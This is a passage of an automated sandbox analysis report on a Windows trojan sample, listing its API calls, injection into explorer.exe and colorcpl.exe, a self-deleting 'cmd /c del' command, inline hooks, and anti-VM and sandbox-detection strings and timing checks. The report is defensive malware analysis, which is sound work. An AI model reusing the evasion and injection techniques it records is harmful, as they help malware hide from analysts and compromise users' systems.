          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9860 NtQuerySystemInformation,LdrInitializeThunk,11_2_016E9860
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9840 NtDelayExecution,LdrInitializeThunk,11_2_016E9840
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E98F0 NtReadVirtualMemory,LdrInitializeThunk,11_2_016E98F0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9A50 NtCreateFile,LdrInitializeThunk,11_2_016E9A50
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9A20 NtResumeThread,LdrInitializeThunk,11_2_016E9A20
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9A00 NtProtectVirtualMemory,LdrInitializeThunk,11_2_016E9A00
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9540 NtReadFile,LdrInitializeThunk,11_2_016E9540
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E95D0 NtClose,LdrInitializeThunk,11_2_016E95D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9710 NtQueryInformationToken,LdrInitializeThunk,11_2_016E9710
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E97A0 NtUnmapViewOfSection,LdrInitializeThunk,11_2_016E97A0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9780 NtMapViewOfSection,LdrInitializeThunk,11_2_016E9780
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9660 NtAllocateVirtualMemory,LdrInitializeThunk,11_2_016E9660
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E96E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_016E96E0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9950 NtQueueApcThread,11_2_016E9950
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E99D0 NtCreateProcessEx,11_2_016E99D0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016EB040 NtSuspendThread,11_2_016EB040
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9820 NtEnumerateKey,11_2_016E9820
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E98A0 NtWriteVirtualMemory,11_2_016E98A0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9B00 NtSetValueKey,11_2_016E9B00
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016EA3B0 NtGetContextThread,11_2_016EA3B0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9A10 NtQuerySection,11_2_016E9A10
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9A80 NtOpenDirectoryObject,11_2_016E9A80
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9560 NtWriteFile,11_2_016E9560
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9520 NtWaitForSingleObject,11_2_016E9520
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016EAD30 NtSetContextThread,11_2_016EAD30
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E95F0 NtQueryInformationFile,11_2_016E95F0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9760 NtOpenProcess,11_2_016E9760
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9770 NtSetInformationFile,11_2_016E9770
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016EA770 NtOpenThread,11_2_016EA770
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9730 NtQueryVirtualMemory,11_2_016E9730
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016EA710 NtOpenProcessToken,11_2_016EA710
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9FE0 NtCreateMutant,11_2_016E9FE0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9670 NtQueryInformationProcess,11_2_016E9670
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9650 NtQueryValueKey,11_2_016E9650
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E9610 NtEnumerateValueKey,11_2_016E9610
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016E96D0 NtCreateKey,11_2_016E96D0
          Source: ClbrTLBbVA.exe, 00000000.00000000.262585621.000000000028A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoGIG5Ul.exeD vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 00000000.00000002.317381764.0000000006F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 00000000.00000002.297081242.00000000008D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 0000000B.00000002.346103337.000000000179F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 0000000B.00000003.291035034.0000000001461000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001663000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exeBinary or memory string: OriginalFilenameoGIG5Ul.exeD vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exeReversingLabs: Detection: 32%
          Source: ClbrTLBbVA.exeVirustotal: Detection: 47%
          Source: ClbrTLBbVA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe C:\Users\user\Desktop\ClbrTLBbVA.exe
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe {path}
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ClbrTLBbVA.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe {path}Jump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe {path}Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exeJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ClbrTLBbVA.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ClbrTLBbVA.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/2@2/1
          Source: ClbrTLBbVA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: ClbrTLBbVA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: ClbrTLBbVA.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: ClbrTLBbVA.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: oGIG5Ul.pdbSHA256 source: ClbrTLBbVA.exe
          Source: Binary string: colorcpl.pdbGCTL source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: oGIG5Ul.pdb source: ClbrTLBbVA.exe
          Source: Binary string: wntdll.pdbUGP source: ClbrTLBbVA.exe, 0000000B.00000003.291035034.000000000134B000.00000004.00000020.00020000.00000000.sdmp, ClbrTLBbVA.exe, 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.347680713.0000000000F2B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.0000000004640000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.000000000475F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.345656425.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ClbrTLBbVA.exe, ClbrTLBbVA.exe, 0000000B.00000003.291035034.000000000134B000.00000004.00000020.00020000.00000000.sdmp, ClbrTLBbVA.exe, 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.347680713.0000000000F2B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.0000000004640000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.000000000475F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.345656425.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0040ACE3 push edi; ret 11_2_0040ACEE
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D4B5 push eax; ret 11_2_0041D508
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D56C push eax; ret 11_2_0041D572
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D502 push eax; ret 11_2_0041D508
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041D50B push eax; ret 11_2_0041D572
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_004175D6 push ss; ret 11_2_004175D9
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_0041EE15 pushfd ; ret 11_2_0041EE16
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016FD0D1 push ecx; ret 11_2_016FD0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.289721058051092

          Hooking and other Techniques for Hiding and Protection

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE4
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: ClbrTLBbVA.exe PID: 5252, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000179904 second address: 000000000017990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 0000000000179B7E second address: 0000000000179B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe TID: 5236Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 648Thread sleep time: -38000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_00409AB0 rdtsc 11_2_00409AB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 874Jump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 0000000C.00000003.474578907.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}z,
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000C.00000002.540183262.000000000F270000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW\A%SystemRoot%\system32\mswsock.dllts\AppTiles\StoreBadgeLogo.pngU
          Source: explorer.exe, 0000000C.00000003.475865525.0000000006FFD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 0000000C.00000003.474578907.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 0000000C.00000002.534112590.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000C.00000003.474578907.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 0000000C.00000003.474578907.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 0000000C.00000003.474578907.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60200a0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir?
          Source: explorer.exe, 0000000C.00000002.530543580.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 0000000C.00000000.317619490.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}.exe,-4000
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000C.00000003.474578907.0000000009054000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_00409AB0 rdtsc 11_2_00409AB0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AC962 mov eax, dword ptr fs:[00000030h]11_2_016AC962
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AB171 mov eax, dword ptr fs:[00000030h]11_2_016AB171
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AB171 mov eax, dword ptr fs:[00000030h]11_2_016AB171
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CB944 mov eax, dword ptr fs:[00000030h]11_2_016CB944
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016CB944 mov eax, dword ptr fs:[00000030h]11_2_016CB944
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C4120 mov eax, dword ptr fs:[00000030h]11_2_016C4120
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C4120 mov eax, dword ptr fs:[00000030h]11_2_016C4120
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C4120 mov eax, dword ptr fs:[00000030h]11_2_016C4120
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C4120 mov eax, dword ptr fs:[00000030h]11_2_016C4120
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016C4120 mov ecx, dword ptr fs:[00000030h]11_2_016C4120
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D513A mov eax, dword ptr fs:[00000030h]11_2_016D513A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D513A mov eax, dword ptr fs:[00000030h]11_2_016D513A
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9100 mov eax, dword ptr fs:[00000030h]11_2_016A9100
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9100 mov eax, dword ptr fs:[00000030h]11_2_016A9100
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016A9100 mov eax, dword ptr fs:[00000030h]11_2_016A9100
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AB1E1 mov eax, dword ptr fs:[00000030h]11_2_016AB1E1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AB1E1 mov eax, dword ptr fs:[00000030h]11_2_016AB1E1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016AB1E1 mov eax, dword ptr fs:[00000030h]11_2_016AB1E1
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_017341E8 mov eax, dword ptr fs:[00000030h]11_2_017341E8
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D61A0 mov eax, dword ptr fs:[00000030h]11_2_016D61A0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016D61A0 mov eax, dword ptr fs:[00000030h]11_2_016D61A0
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_017269A6 mov eax, dword ptr fs:[00000030h]11_2_017269A6
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeCode function: 11_2_016DA185 mov eax, dword ptr fs:[00000030h]11_2_016DA185
